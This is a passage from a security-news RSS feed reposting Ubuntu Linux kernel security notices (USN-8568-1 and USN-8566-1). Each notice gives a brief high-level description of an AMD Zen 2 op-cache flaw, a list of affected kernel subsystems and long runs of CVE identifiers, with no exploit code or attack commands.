CVE-2026-31713, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31717, CVE-2026-31718, CVE-2026-31719, CVE-2026-43058,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43348,
CVE-2026-43349, CVE-2026-43350, CVE-2026-43490, CVE-2026-43491,
CVE-2026-43492, CVE-2026-43493, CVE-2026-43494, CVE-2026-43495,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43498, CVE-2026-43499,
CVE-2026-43501, CVE-2026-43502, CVE-2026-45834, CVE-2026-45835,
CVE-2026-45836, CVE-2026-45837, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45986,
CVE-2026-45987, CVE-2026-45988, CVE-2026-45989, CVE-2026-45990,
CVE-2026-45991, CVE-2026-45994, CVE-2026-45995, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46001, CVE-2026-46002,
CVE-2026-46003, CVE-2026-46004, CVE-2026-46005, CVE-2026-46006,
CVE-2026-46007, CVE-2026-46008, CVE-2026-46009, CVE-2026-46010,
CVE-2026-46011, CVE-2026-46012, CVE-2026-46013, CVE-2026-46014,
CVE-2026-46015, CVE-2026-46016, CVE-2026-46018, CVE-2026-46019,
CVE-2026-46020, CVE-2026-46021, CVE-2026-46022, CVE-2026-46023,
CVE-2026-46024, CVE-2026-46025, CVE-2026-46026, CVE-2026-46027,
CVE-2026-46028, CVE-2026-46029, CVE-2026-46030, CVE-2026-46031,
CVE-2026-46032, CVE-2026-46033, CVE-2026-46034, CVE-2026-46035,
CVE-2026-46036, CVE-2026-46037, CVE-2026-46038, CVE-2026-46039,
CVE-2026-46040, CVE-2026-46041, CVE-2026-46042, CVE-2026-46043,
CVE-2026-46044, CVE-2026-46045, CVE-2026-46046, CVE-2026-46047,
CVE-2026-46049, CVE-2026-46050, CVE-2026-46051, CVE-2026-46052,
CVE-2026-46053, CVE-2026-46054, CVE-2026-46056, CVE-2026-46057,
CVE-2026-46058, CVE-2026-46059, CVE-2026-46060, CVE-2026-46061,
CVE-2026-46062, CVE-2026-46063, CVE-2026-46064, CVE-2026-46065,
CVE-2026-46066, CVE-2026-46067, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46071, CVE-2026-46072, CVE-2026-46073,
CVE-2026-46074, CVE-2026-46075, CVE-2026-46076, CVE-2026-46077,
CVE-2026-46078, CVE-2026-46079, CVE-2026-46080, CVE-2026-46081,
CVE-2026-46082, CVE-2026-46083, CVE-2026-46084, CVE-2026-46085,
CVE-2026-46086, CVE-2026-46087, CVE-2026-46088, CVE-2026-46089,
CVE-2026-46090, CVE-2026-46091, CVE-2026-46092, CVE-2026-46093,
CVE-2026-46094, CVE-2026-46095, CVE-2026-46096, CVE-2026-46097,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46100, CVE-2026-46101,
CVE-2026-46102, CVE-2026-46103, CVE-2026-46104, CVE-2026-46105,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46109,
CVE-2026-46110, CVE-2026-46111, CVE-2026-46112, CVE-2026-46113,
CVE-2026-46114, CVE-2026-46115, CVE-2026-46116, CVE-2026-46117,
CVE-2026-46118, CVE-2026-46119, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46130, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46134, CVE-2026-46135, CVE-2026-46136, CVE-2026-46137,
CVE-2026-46138, CVE-2026-46139, CVE-2026-46140, CVE-2026-46141,
CVE-2026-46142, CVE-2026-46143, CVE-2026-46144, CVE-2026-46145,
CVE-2026-46146, CVE-2026-46147, CVE-2026-46148, CVE-2026-46149,
CVE-2026-46150, CVE-2026-46151, CVE-2026-46152, CVE-2026-46153,
CVE-2026-46154, CVE-2026-46155, CVE-2026-46156, CVE-2026-46157,
CVE-2026-46158, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46162, CVE-2026-46163, CVE-2026-46164, CVE-2026-46165,
CVE-2026-46166, CVE-2026-46167, CVE-2026-46168, CVE-2026-46169,
CVE-2026-46170, CVE-2026-46171, CVE-2026-46172, CVE-2026-46173,
CVE-2026-46174, CVE-2026-46175, CVE-2026-46176, CVE-2026-46177,
CVE-2026-46178, CVE-2026-46179, CVE-2026-46180, CVE-2026-46181,
CVE-2026-46182, CVE-2026-46183, CVE-2026-46184, CVE-2026-46185,
CVE-2026-46186, CVE-2026-46187, CVE-2026-46188, CVE-2026-46189,
CVE-2026-46190, CVE-2026-46191, CVE-2026-46192, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46195, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46202, CVE-2026-46203, CVE-2026-46204, CVE-2026-46205,
CVE-2026-46206, CVE-2026-46207, CVE-2026-46208, CVE-2026-46209,
CVE-2026-46210, CVE-2026-46211, CVE-2026-46212, CVE-2026-46213,
CVE-2026-46214, CVE-2026-46215, CVE-2026-46216, CVE-2026-46218,
CVE-2026-46219, CVE-2026-46220, CVE-2026-46221, CVE-2026-46222,
CVE-2026-46223, CVE-2026-46224, CVE-2026-46225, CVE-2026-46226,
CVE-2026-46227, CVE-2026-46228, CVE-2026-46229, CVE-2026-46230,
CVE-2026-46231, CVE-2026-46232, CVE-2026-46233, CVE-2026-46234,
CVE-2026-46235, CVE-2026-46236, CVE-2026-46238, CVE-2026-46239,
CVE-2026-46240, CVE-2026-46241, CVE-2026-46242, CVE-2026-46243,
CVE-2026-46244, CVE-2026-46273, CVE-2026-46274, CVE-2026-46275,
CVE-2026-46276, CVE-2026-46277, CVE-2026-46278, CVE-2026-46279,
CVE-2026-46280, CVE-2026-46281, CVE-2026-46282, CVE-2026-46283,
CVE-2026-46284, CVE-2026-46285, CVE-2026-46286, CVE-2026-46287,
CVE-2026-46288, CVE-2026-46289, CVE-2026-46290, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46295,
CVE-2026-46296, CVE-2026-46297, CVE-2026-46298, CVE-2026-46299,
CVE-2026-46301, CVE-2026-46302, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46305, CVE-2026-46306, CVE-2026-46307, CVE-2026-46308,
CVE-2026-46309, CVE-2026-46310, CVE-2026-46311, CVE-2026-46312,
CVE-2026-46313, CVE-2026-46314, CVE-2026-46315, CVE-2026-46316,
CVE-2026-46317, CVE-2026-46318, CVE-2026-46319, CVE-2026-46320,
CVE-2026-46321, CVE-2026-46322, CVE-2026-46323, CVE-2026-46324,
CVE-2026-46332, CVE-2026-52904, CVE-2026-52905, CVE-2026-52906,
CVE-2026-52907, CVE-2026-52911, CVE-2026-52912, CVE-2026-52913,
CVE-2026-52914, CVE-2026-52915, CVE-2026-52916, CVE-2026-52918,
CVE-2026-52919, CVE-2026-52920, CVE-2026-52921, CVE-2026-52922,
CVE-2026-52923, CVE-2026-52925, CVE-2026-52926, CVE-2026-52927,
CVE-2026-52928, CVE-2026-52931, CVE-2026-52932, CVE-2026-52933,
CVE-2026-52934, CVE-2026-52936, CVE-2026-52937, CVE-2026-52941,
CVE-2026-52943, CVE-2026-52944, CVE-2026-52949, CVE-2026-52950,
CVE-2026-52951, CVE-2026-52952, CVE-2026-52953, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52956, CVE-2026-52957, CVE-2026-52958,
CVE-2026-52959, CVE-2026-52960, CVE-2026-52961, CVE-2026-52962,
CVE-2026-52963, CVE-2026-52964, CVE-2026-52965, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52971,
CVE-2026-52973, CVE-2026-52974, CVE-2026-52975, CVE-2026-52976,
CVE-2026-52977, CVE-2026-52978, CVE-2026-52979, CVE-2026-52980,
CVE-2026-52981, CVE-2026-52982, CVE-2026-52983, CVE-2026-52984,
CVE-2026-52985, CVE-2026-52986, CVE-2026-52987, CVE-2026-52988,
CVE-2026-52989, CVE-2026-52990, CVE-2026-52991, CVE-2026-52992,
CVE-2026-52993, CVE-2026-52994, CVE-2026-52995, CVE-2026-52996,
CVE-2026-52997, CVE-2026-52998, CVE-2026-52999, CVE-2026-53000,
CVE-2026-53001, CVE-2026-53002, CVE-2026-53003, CVE-2026-53004,
CVE-2026-53005, CVE-2026-53006, CVE-2026-53007, CVE-2026-53008,
CVE-2026-53009, CVE-2026-53010, CVE-2026-53011, CVE-2026-53012,
CVE-2026-53013, CVE-2026-53014, CVE-2026-53015, CVE-2026-53016,
CVE-2026-53017, CVE-2026-53018, CVE-2026-53019, CVE-2026-53020,
CVE-2026-53021, CVE-2026-53022, CVE-2026-53023, CVE-2026-53024,
CVE-2026-53025, CVE-2026-53026, CVE-2026-53027, CVE-2026-53028,
CVE-2026-53029, CVE-2026-53030, CVE-2026-53031, CVE-2026-53032,
CVE-2026-53033, CVE-2026-53034, CVE-2026-53035, CVE-2026-53036,
CVE-2026-53037, CVE-2026-53038, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53042, CVE-2026-53043, CVE-2026-53044,
CVE-2026-53045, CVE-2026-53046, CVE-2026-53047, CVE-2026-53048,
CVE-2026-53049, CVE-2026-53050, CVE-2026-53051, CVE-2026-53052,
CVE-2026-53053, CVE-2026-53054, CVE-2026-53055, CVE-2026-53056,
CVE-2026-53057, CVE-2026-53058, CVE-2026-53059, CVE-2026-53060,
CVE-2026-53061, CVE-2026-53062, CVE-2026-53063, CVE-2026-53064,
CVE-2026-53065, CVE-2026-53066, CVE-2026-53067, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53070, CVE-2026-53071, CVE-2026-53072,
CVE-2026-53073, CVE-2026-53074, CVE-2026-53075, CVE-2026-53076,
CVE-2026-53077, CVE-2026-53078, CVE-2026-53079, CVE-2026-53080,
CVE-2026-53081, CVE-2026-53082, CVE-2026-53083, CVE-2026-53084,
CVE-2026-53085, CVE-2026-53086, CVE-2026-53087, CVE-2026-53088,
CVE-2026-53089, CVE-2026-53090, CVE-2026-53091, CVE-2026-53092,
CVE-2026-53093, CVE-2026-53094, CVE-2026-53095, CVE-2026-53096,
CVE-2026-53097, CVE-2026-53098, CVE-2026-53099, CVE-2026-53100,
CVE-2026-53101, CVE-2026-53102, CVE-2026-53103, CVE-2026-53104,
CVE-2026-53105, CVE-2026-53106, CVE-2026-53107, CVE-2026-53108,
CVE-2026-53109, CVE-2026-53110, CVE-2026-53111, CVE-2026-53112,
CVE-2026-53113, CVE-2026-53114, CVE-2026-53115, CVE-2026-53116,
CVE-2026-53117, CVE-2026-53118, CVE-2026-53119, CVE-2026-53120,
CVE-2026-53121, CVE-2026-53122, CVE-2026-53123, CVE-2026-53124,
CVE-2026-53125, CVE-2026-53126, CVE-2026-53127, CVE-2026-53128,
CVE-2026-53129, CVE-2026-53130, CVE-2026-53174, CVE-2026-53277,
CVE-2026-53278, CVE-2026-53279, CVE-2026-53280, CVE-2026-53281,
CVE-2026-53282, CVE-2026-53283, CVE-2026-53284, CVE-2026-53285,
CVE-2026-53286, CVE-2026-53287, CVE-2026-53288, CVE-2026-53289,
CVE-2026-53290, CVE-2026-53291, CVE-2026-53292, CVE-2026-53293,
CVE-2026-53294, CVE-2026-53295, CVE-2026-53296, CVE-2026-53297,
CVE-2026-53298, CVE-2026-53299, CVE-2026-53300, CVE-2026-53301,
CVE-2026-53302, CVE-2026-53303, CVE-2026-53304, CVE-2026-53305,
CVE-2026-53306, CVE-2026-53307, CVE-2026-53308, CVE-2026-53309,
CVE-2026-53310, CVE-2026-53311, CVE-2026-53312, CVE-2026-53313,
CVE-2026-53314, CVE-2026-53315, CVE-2026-53316, CVE-2026-53317,
CVE-2026-53318, CVE-2026-53319, CVE-2026-53320, CVE-2026-53321,
CVE-2026-53322, CVE-2026-53323, CVE-2026-53324, CVE-2026-53357,
CVE-2026-53358, CVE-2026-53360, CVE-2026-53364, CVE-2026-53365)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8568-1: Linux kernel (OEM) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security iss...]]></description>
<link>https://tsecurity.de/de/3681577/unix-server/usn-8568-1-linux-kernel-oem-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681577/unix-server/usn-8568-1-linux-kernel-oem-vulnerabilities/</guid>
<pubDate>Mon, 20 Jul 2026 18:01:28 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - PSP security protocol;
  - ARM64 architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - User-Mode Linux (UML);
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Intel NPU Driver;
  - DRBD Distributed Replicated Block Device drivers;
  - Ublk userspace block driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - EDAC drivers;
  - EFI core;
  - FWCTL subsystem;
  - GPU drivers;
  - HID subsystem;
  - I3C subsystem;
  - InfiniBand drivers;
  - IOMMU subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - NVIDIA Tegra memory controller driver;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - MediaTek network drivers;
  - NVME drivers;
  - PCI subsystem;
  - Pin controllers subsystem;
  - Chrome hardware platform drivers;
  - ACPI WMI driver;
  - x86 platform drivers;
  - Generic PM domains;
  - MediaTek PM domains;
  - Power supply drivers;
  - MPAM driver;
  - Amlogic Meson reset controller drivers;
  - S/390 drivers;
  - SCSI subsystem;
  - NVIDIA Tegra Control Backbone (CBB) driver;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - TCM subsystem;
  - TTY drivers;
  - USB Device Class drivers;
  - ULPI bus;
  - USB Type-C support driver;
  - TI TPS6598x USB Power Delivery controller driver;
  - vDPA drivers;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM AMD SEV Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - HugeTLB file system;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - Tracing file system;
  - DRM TTM subsystem;
  - Control group (cgroup);
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Freescale ENETC Ethernet drivers;
  - Memory Management;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Bluetooth subsystem;
  - Networking core;
  - Netfilter;
  - Network traffic control;
  - io_uring subsystem;
  - IPC subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Padata parallel execution mechanism;
  - Scheduler infrastructure;
  - Tracing infrastructure;
  - Cryptographic library;
  - Memory management;
  - 802.1Q VLAN protocol;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - Ceph Core library;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - MAC80211 subsystem;
  - Multipath TCP;
  - Open vSwitch;
  - Phonet protocol;
  - RDS protocol;
  - SCTP protocol;
  - SMC sockets;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - XFRM subsystem;
  - Integrity Measurement Architecture(IMA) framework;
  - SELinux security module;
  - ALSA framework;
  - HD-audio driver;
  - QCOM ASoC drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - KVM subsystem;
(CVE-2026-43490, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43498, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45837, CVE-2026-45838,
CVE-2026-45839, CVE-2026-45840, CVE-2026-45841, CVE-2026-45842,
CVE-2026-45843, CVE-2026-45844, CVE-2026-45845, CVE-2026-45846,
CVE-2026-46104, CVE-2026-46105, CVE-2026-46106, CVE-2026-46107,
CVE-2026-46108, CVE-2026-46109, CVE-2026-46110, CVE-2026-46111,
CVE-2026-46112, CVE-2026-46113, CVE-2026-46114, CVE-2026-46116,
CVE-2026-46117, CVE-2026-46118, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46130, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46134, CVE-2026-46136, CVE-2026-46138, CVE-2026-46139,
CVE-2026-46140, CVE-2026-46141, CVE-2026-46142, CVE-2026-46143,
CVE-2026-46144, CVE-2026-46145, CVE-2026-46146, CVE-2026-46147,
CVE-2026-46148, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46152, CVE-2026-46153, CVE-2026-46154, CVE-2026-46156,
CVE-2026-46157, CVE-2026-46158, CVE-2026-46159, CVE-2026-46160,
CVE-2026-46161, CVE-2026-46162, CVE-2026-46163, CVE-2026-46164,
CVE-2026-46165, CVE-2026-46166, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46170, CVE-2026-46171, CVE-2026-46172,
CVE-2026-46173, CVE-2026-46174, CVE-2026-46175, CVE-2026-46176,
CVE-2026-46177, CVE-2026-46178, CVE-2026-46179, CVE-2026-46180,
CVE-2026-46181, CVE-2026-46182, CVE-2026-46183, CVE-2026-46184,
CVE-2026-46186, CVE-2026-46187, CVE-2026-46188, CVE-2026-46189,
CVE-2026-46190, CVE-2026-46191, CVE-2026-46192, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46202,
CVE-2026-46203, CVE-2026-46204, CVE-2026-46205, CVE-2026-46206,
CVE-2026-46207, CVE-2026-46208, CVE-2026-46209, CVE-2026-46210,
CVE-2026-46211, CVE-2026-46212, CVE-2026-46213, CVE-2026-46214,
CVE-2026-46215, CVE-2026-46216, CVE-2026-46218, CVE-2026-46219,
CVE-2026-46220, CVE-2026-46221, CVE-2026-46222, CVE-2026-46223,
CVE-2026-46224, CVE-2026-46225, CVE-2026-46226, CVE-2026-46227,
CVE-2026-46228, CVE-2026-46229, CVE-2026-46230, CVE-2026-46231,
CVE-2026-46232, CVE-2026-46233, CVE-2026-46234, CVE-2026-46235,
CVE-2026-46236, CVE-2026-46238, CVE-2026-46239, CVE-2026-46240,
CVE-2026-46241, CVE-2026-46242, CVE-2026-46273, CVE-2026-46274,
CVE-2026-46275, CVE-2026-46290, CVE-2026-46291, CVE-2026-46292,
CVE-2026-46293, CVE-2026-46294, CVE-2026-46295, CVE-2026-46296,
CVE-2026-46297, CVE-2026-46298, CVE-2026-46299, CVE-2026-46301,
CVE-2026-46302, CVE-2026-46303, CVE-2026-46304, CVE-2026-46305,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46308, CVE-2026-46309,
CVE-2026-46310, CVE-2026-46311, CVE-2026-46312, CVE-2026-46313,
CVE-2026-46314, CVE-2026-46315, CVE-2026-46317, CVE-2026-46318,
CVE-2026-46319, CVE-2026-46320, CVE-2026-46321, CVE-2026-46322,
CVE-2026-46324, CVE-2026-52911, CVE-2026-52912, CVE-2026-52913,
CVE-2026-52914, CVE-2026-52915, CVE-2026-52916, CVE-2026-52918,
CVE-2026-52919, CVE-2026-52920, CVE-2026-52921, CVE-2026-52922,
CVE-2026-52923, CVE-2026-52925, CVE-2026-52926, CVE-2026-52927,
CVE-2026-52928, CVE-2026-52931, CVE-2026-52932, CVE-2026-52934,
CVE-2026-52936, CVE-2026-52937, CVE-2026-52941, CVE-2026-52943,
CVE-2026-52944, CVE-2026-52949, CVE-2026-52950, CVE-2026-52951,
CVE-2026-52952, CVE-2026-52953, CVE-2026-52954, CVE-2026-52955,
CVE-2026-52956, CVE-2026-52957, CVE-2026-52958, CVE-2026-52959,
CVE-2026-52960, CVE-2026-52961, CVE-2026-52962, CVE-2026-52963,
CVE-2026-52964, CVE-2026-52965, CVE-2026-52967, CVE-2026-52968,
CVE-2026-52969, CVE-2026-52970, CVE-2026-52971, CVE-2026-52973,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52976, CVE-2026-52977,
CVE-2026-52978, CVE-2026-52979, CVE-2026-52980, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52983, CVE-2026-52984, CVE-2026-52985,
CVE-2026-52986, CVE-2026-52987, CVE-2026-52988, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52991, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52994, CVE-2026-52995, CVE-2026-52996, CVE-2026-52997,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53000, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53005,
CVE-2026-53006, CVE-2026-53007, CVE-2026-53008, CVE-2026-53009,
CVE-2026-53010, CVE-2026-53011, CVE-2026-53012, CVE-2026-53013,
CVE-2026-53014, CVE-2026-53015, CVE-2026-53016, CVE-2026-53017,
CVE-2026-53018, CVE-2026-53019, CVE-2026-53020, CVE-2026-53021,
CVE-2026-53022, CVE-2026-53023, CVE-2026-53024, CVE-2026-53025,
CVE-2026-53026, CVE-2026-53027, CVE-2026-53028, CVE-2026-53029,
CVE-2026-53030, CVE-2026-53031, CVE-2026-53032, CVE-2026-53033,
CVE-2026-53034, CVE-2026-53035, CVE-2026-53036, CVE-2026-53037,
CVE-2026-53038, CVE-2026-53039, CVE-2026-53040, CVE-2026-53041,
CVE-2026-53042, CVE-2026-53043, CVE-2026-53044, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53051, CVE-2026-53052, CVE-2026-53053,
CVE-2026-53054, CVE-2026-53055, CVE-2026-53056, CVE-2026-53057,
CVE-2026-53058, CVE-2026-53059, CVE-2026-53060, CVE-2026-53061,
CVE-2026-53062, CVE-2026-53063, CVE-2026-53064, CVE-2026-53065,
CVE-2026-53066, CVE-2026-53067, CVE-2026-53068, CVE-2026-53069,
CVE-2026-53070, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53078, CVE-2026-53079, CVE-2026-53080, CVE-2026-53081,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53087, CVE-2026-53088, CVE-2026-53089,
CVE-2026-53090, CVE-2026-53091, CVE-2026-53092, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53095, CVE-2026-53096, CVE-2026-53097,
CVE-2026-53098, CVE-2026-53099, CVE-2026-53100, CVE-2026-53101,
CVE-2026-53102, CVE-2026-53103, CVE-2026-53104, CVE-2026-53105,
CVE-2026-53106, CVE-2026-53107, CVE-2026-53108, CVE-2026-53109,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53113,
CVE-2026-53114, CVE-2026-53115, CVE-2026-53116, CVE-2026-53117,
CVE-2026-53118, CVE-2026-53119, CVE-2026-53120, CVE-2026-53121,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53124, CVE-2026-53125,
CVE-2026-53126, CVE-2026-53127, CVE-2026-53128, CVE-2026-53129,
CVE-2026-53130, CVE-2026-53277, CVE-2026-53278, CVE-2026-53279,
CVE-2026-53280, CVE-2026-53281, CVE-2026-53282, CVE-2026-53283,
CVE-2026-53284, CVE-2026-53285, CVE-2026-53286, CVE-2026-53287,
CVE-2026-53288, CVE-2026-53289, CVE-2026-53290, CVE-2026-53291,
CVE-2026-53292, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53297, CVE-2026-53298, CVE-2026-53299,
CVE-2026-53300, CVE-2026-53301, CVE-2026-53302, CVE-2026-53303,
CVE-2026-53304, CVE-2026-53305, CVE-2026-53306, CVE-2026-53307,
CVE-2026-53308, CVE-2026-53309, CVE-2026-53310, CVE-2026-53311,
CVE-2026-53312, CVE-2026-53313, CVE-2026-53314, CVE-2026-53315,
CVE-2026-53316, CVE-2026-53317, CVE-2026-53318, CVE-2026-53319,
CVE-2026-53320, CVE-2026-53321, CVE-2026-53322, CVE-2026-53323,
CVE-2026-53324, CVE-2026-53357, CVE-2026-53358, CVE-2026-53360,
CVE-2026-53364, CVE-2026-53365)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8566-1: Linux kernel vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security iss...]]></description>
<link>https://tsecurity.de/de/3681568/unix-server/usn-8566-1-linux-kernel-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681568/unix-server/usn-8566-1-linux-kernel-vulnerabilities/</guid>
<pubDate>Mon, 20 Jul 2026 17:46:50 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - PSP security protocol;
  - ARM64 architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - User-Mode Linux (UML);
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Intel NPU Driver;
  - DRBD Distributed Replicated Block Device drivers;
  - Ublk userspace block driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - EDAC drivers;
  - EFI core;
  - FWCTL subsystem;
  - GPU drivers;
  - HID subsystem;
  - I3C subsystem;
  - InfiniBand drivers;
  - IOMMU subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - NVIDIA Tegra memory controller driver;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - MediaTek network drivers;
  - NVME drivers;
  - PCI subsystem;
  - Pin controllers subsystem;
  - Chrome hardware platform drivers;
  - ACPI WMI driver;
  - x86 platform drivers;
  - Generic PM domains;
  - MediaTek PM domains;
  - Power supply drivers;
  - MPAM driver;
  - Amlogic Meson reset controller drivers;
  - S/390 drivers;
  - SCSI subsystem;
  - NVIDIA Tegra Control Backbone (CBB) driver;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - TCM subsystem;
  - TTY drivers;
  - USB Device Class drivers;
  - ULPI bus;
  - USB Type-C support driver;
  - TI TPS6598x USB Power Delivery controller driver;
  - vDPA drivers;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM AMD SEV Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - HugeTLB file system;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Overlay file system;
  - Diskquota system;
  - SMB network file system;
  - Tracing file system;
  - DRM TTM subsystem;
  - Control group (cgroup);
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Freescale ENETC Ethernet drivers;
  - Memory Management;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Bluetooth subsystem;
  - Networking core;
  - Netfilter;
  - Network traffic control;
  - io_uring subsystem;
  - IPC subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Padata parallel execution mechanism;
  - Scheduler infrastructure;
  - Tracing infrastructure;
  - Cryptographic library;
  - Memory management;
  - 802.1Q VLAN protocol;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - Ceph Core library;
  - Distributed Switch Architecture;
  - IPv4 networking;
